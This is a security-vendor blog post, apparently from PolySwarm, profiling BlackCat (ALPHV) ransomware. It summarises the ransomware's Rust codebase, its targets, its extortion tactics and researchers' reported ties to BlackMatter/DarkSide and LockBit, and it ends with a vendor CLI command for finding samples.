In our PolySwarm 2021 Year in Review, we made several predictions for this year, including that BlackCat ransomware would become more prevalent, due to its sophistication. BlackCat ransomware is ransomware as a service (RaaS), which was recently linked to the
BlackMatter/DarkSide ransomware gang in a report by Cisco Talos.
What is BlackCat?
BlackCat, also known as ALPHV, was first observed in late 2021. BlackCat is a RaaS that includes a highly-customizable feature set, allowing for attacks on a wide range of targets. BlackCat is written in Rust, a language seldom used by ransomware developers, and can infect both Windows and Linux machines. The ransomware is being promoted on Russian language hacking forums.
BlackCat attacks have occurred in the US, Europe, the Philippines, and other regions. Verticals targeted include construction and engineering, retail, transportation, commercial services, insurance, machinery, professional services, telecommunication, auto components, and pharmaceuticals. Palo Alto’s Unit 42 noted several reasons for the growing popularity of BlackCat. First, the group has been effective in marketing to its affiliates, and affiliates receive a generous share of ransom payments. Second, the malware is perhaps the first ransomware written in Rust. Developers can easily change the code to pivot and individualize attacks. Third, the threat actors behind BlackCat use double and triple extortion tactics, charging a ransom to decrypt files and threatening to disclose files or engage in DDoS attacks if the ransom is not paid.
Industry researchers have speculated a connection between BlackCat and the BlackMatter/DarkSide ransomware gang, who attacked Colonial Pipeline last year. Researchers at Cisco Talos provided a comparison of BlackCat and BlackMatter attacks they observed. They noted a domain and IP address associated with BlackCat was previously used as a C2 in a BlackMatter attack. At this time, the initial infection vector used in the BlackCat attacks analyzed by Cisco Talos is unknown. However, in a BlackMatter attack they analyzed, the threat actors likely established initial access by exploiting Microsoft Exchange vulnerabilities.
Cisco Talos also noted other commonalities in BlackCat and BlackMatter TTPs:
- Both ransomware families use reverse SSH tunnels and scheduled tasks to maintain persistence
- Both use LSASS for credential access
- Both use lmpacket, RDP, and psexec for command and control
An individual associated with BlackCat said the group is not a rebranding of BlackMatter, but its team members are affiliated with other RaaS groups. However, another individual associated with the LockBit gang said BlackCat is a rebrand of DarkSide/BlackMatter, and researchers at CyberReason found commonalities and shared infrastructure between BlackCat and LockBit.
PolySwarm has multiple samples of BlackCat. A selection of IOCs for these samples is found below.
You can use the following CLI command to search for all xx samples in our portal:
$ polyswarm link list -f BlackCat
Don’t have a PolySwarm account? Go here to sign up for a free Community plan or to subscribe.
Contact us at firstname.lastname@example.org | Check out our blog | Subscribe to our reports